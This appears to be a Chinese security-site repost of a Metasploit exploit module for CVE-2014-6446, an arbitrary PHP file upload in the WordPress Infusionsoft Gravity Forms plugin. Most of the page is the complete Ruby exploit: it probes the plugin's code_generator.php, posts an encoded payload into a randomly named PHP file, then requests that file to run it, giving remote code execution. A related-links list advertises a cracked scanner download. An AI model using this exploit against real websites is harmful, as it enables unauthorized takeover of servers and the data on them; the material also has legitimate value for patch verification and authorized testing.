关注我们
QRcode 邮件联系 QRcode

WordPress InfusionSoft Upload Exploit

 feng  667 ℃  0条点评
Full title WordPress InfusionSoft Upload Exploit
Date add 2014-10-09
Category web applications
Platform php
Risk
CVE CVE-2014-6446

Description:
This Metasploit module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

EXP:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: <a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a>
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin',                    # Vulnerability Discovery
          'us3r777 <us3r777@n0b0.so>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', '<a href="http://research.g0blin.co.uk/cve-2014-6446/">http://research.g0blin.co.uk/cve-2014-6446/</a>'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end
  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )
    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end
  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })
    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end
    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end
end
# 427C3B60F50B06D8   1337day.com [2014-10-09]   3CE1B3F435C7F156 #
本文标签:
苹果mac os x修复bash漏洞推出下载补丁
F5 iControl Remote Root Command Execution Exploit
安全扫描神器Acunetix Web Vulnerability Scanner 10发布(含破解版下载)安全扫描神器Acunetix Web Vulnerability Scanner 10发布(含破解版下载)如何使用XSSaminer工具在PHP源码中挖掘XSS漏洞如何使用XSSaminer工具在PHP源码中挖掘XSS漏洞渗透测试工具实战技巧合集渗透测试工具实战技巧合集linux+apache+mysql+php安全加固配置说明linux+apache+mysql+php安全加固配置说明

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码